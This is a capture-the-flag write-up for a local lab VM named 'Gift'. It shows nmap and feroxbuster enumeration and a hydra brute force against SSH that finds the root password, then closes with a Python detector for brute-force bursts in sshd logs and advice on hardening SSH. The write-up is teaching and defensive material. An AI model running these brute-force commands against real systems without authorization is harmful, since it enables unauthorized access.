This machine only provides SSH and web services. The only interesting thing is that the web service reminds us not to overthink it - it's incredibly simple.

Besides the web service, the only thing left is SSH. Based on this hint, I plan to try some common credentials to brute-force this service. Fortunately, I successfully obtained the root user credential.

Summary

Scope

  • Name: Gift
  • Difficulty: Easy
  • OS: Linux
  • IP: Local VM

Learned

Sometimes, things can be simple enough!

Enumeration

Nmap

Overall

nmap -sT --min-rate 5000 -oN overall [IP]

Nmap scan report for 192.168.1.36
Host is up (0.000042s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Detail

nmap -sC -sV -O -vv -p22,80 -oN detail [IP]

Nmap scan report for 192.168.1.36
Host is up (0.00049s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
|   3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA)
|   256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA)
|_  256 81:ab:36:ec:b1:2b:5c:d2:86:55:12:0c:51:00:27:d7 (ED25519)
80/tcp open  http    nginx
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_  Supported Methods: GET HEAD
MAC Address: 08:00:27:77:EF:80 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Uptime guess: 4.381 days (since Wed Feb 25 06:32:30 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros

UDPScan

nmap -sU --top-ports 32 -oN udpscan [IP]

Nmap scan report for 192.168.1.36
Host is up (0.00039s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    closed        dhcpc
69/udp    open|filtered tftp
111/udp   open|filtered rpcbind
123/udp   open|filtered ntp
135/udp   open|filtered msrpc
136/udp   open|filtered profile
137/udp   open|filtered netbios-ns
138/udp   closed        netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open|filtered snmp
162/udp   closed        snmptrap
445/udp   open|filtered microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   open|filtered route
631/udp   open|filtered ipp
996/udp   open|filtered vsinet
997/udp   closed        maitrd
998/udp   open|filtered puparp
999/udp   closed        applix
1434/udp  closed        ms-sql-m
1701/udp  closed        L2TP
1812/udp  open|filtered radius
1900/udp  closed        upnp
3283/udp  closed        netassistant
4500/udp  closed        nat-t-ike
5353/udp  open|filtered zeroconf
49152/udp open|filtered unknown
49153/udp open|filtered unknown
49154/udp closed        unknown
MAC Address: 08:00:27:77:EF:80 (Oracle VirtualBox virtual NIC)

Web

❰curtain❙~/workspace/shooting/hmvm/gift❱✔≻ curl http://192.168.1.36

Dont Overthink. Really, Its simple.
	<!-- Trust me -->

Here the web service hints that it's really simple.

Web content enumeration turns up nothing else.

❰curtain❙~/workspace/shooting/hmvm/gift❱✔≻ feroxbuster -u http://192.168.1.36/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x pdf,txt,php,zip,db,bak

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.1.36/
 🚩  In-Scope Url          │ 192.168.1.36
 🚀  Threads               │ 64
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /home/curtain/.config/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [pdf, txt, php, zip, db, bak]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        7l       11w      146c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        4l        9w       57c http://192.168.1.36/
[####################] - 73s  1543822/1543822 0s      found:1       errors:1
[####################] - 72s  1543822/1543822 21303/s http://192.168.1.36/

Pwned

Because we found nothing interesting apart from the "really simple" hint, the only thing left is to look for weaknesses in the SSH service. Based on the hint, we can try some common usernames such as root/admin.

❰curtain❙~/workspace/shooting/hmvm/gift❱✔≻ hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.36 ssh -t 4
...
[DATA] attacking ssh://192.168.1.36:22/
[22][ssh] host: 192.168.1.36   login: root   password: simple
1 of 1 target successfully completed, 1 valid password found

Yeah! We got it with the root user!
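
Seen from the target's side, a password-guessing run like the hydra one above shows up in the sshd log as a burst of failed password attempts from one address followed by an accepted password. The following is an added example, not part of the original write-up, that flags that pattern; the log lines, the source address 192.168.1.10, the default year and the threshold/window values are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in OpenSSH's syslog format (not captured from the target VM).
SAMPLE_LOG = """\
Mar  1 15:40:01 gift sshd[1201]: Failed password for root from 192.168.1.10 port 40112 ssh2
Mar  1 15:40:01 gift sshd[1202]: Failed password for root from 192.168.1.10 port 40114 ssh2
Mar  1 15:40:03 gift sshd[1203]: Failed password for root from 192.168.1.10 port 40116 ssh2
Mar  1 15:40:03 gift sshd[1204]: Failed password for root from 192.168.1.10 port 40118 ssh2
Mar  1 15:40:05 gift sshd[1205]: Failed password for invalid user admin from 192.168.1.77 port 51000 ssh2
Mar  1 15:40:06 gift sshd[1206]: Failed password for root from 192.168.1.10 port 40120 ssh2
Mar  1 15:40:08 gift sshd[1207]: Accepted password for root from 192.168.1.10 port 40122 ssh2
Mar  1 16:05:10 gift sshd[1310]: Failed password for alice from 192.168.1.50 port 52000 ssh2
Mar  1 16:05:21 gift sshd[1311]: Accepted password for alice from 192.168.1.50 port 52002 ssh2
Mar  1 16:30:00 gift sshd[1400]: Accepted publickey for bob from 192.168.1.51 port 53000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\S+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse(log_text, year=2026):
    """Yield (time, result, method, user, ip); syslog omits the year, so it is assumed."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["method"], m["user"], m["ip"]

def brute_force_successes(log_text, threshold=5, window=timedelta(minutes=10)):
    """Return password logins preceded by >= threshold failures from the same IP."""
    failures = defaultdict(list)  # source IP -> timestamps of failed passwords
    alerts = []
    for ts, result, method, user, ip in parse(log_text):
        if method != "password":
            continue  # key-based logins cannot be the result of password guessing
        if result == "Failed":
            failures[ip].append(ts)
            continue
        recent = [t for t in failures[ip] if ts - t <= window]
        if len(recent) >= threshold:
            alerts.append({"ip": ip, "user": user, "failed_before": len(recent), "time": ts})
        failures[ip].clear()  # a success starts a new counting period for this IP
    return alerts
```

On the server itself, setting `PermitRootLogin prohibit-password` and `PasswordAuthentication no` in sshd_config closes this path regardless of how weak the root password is.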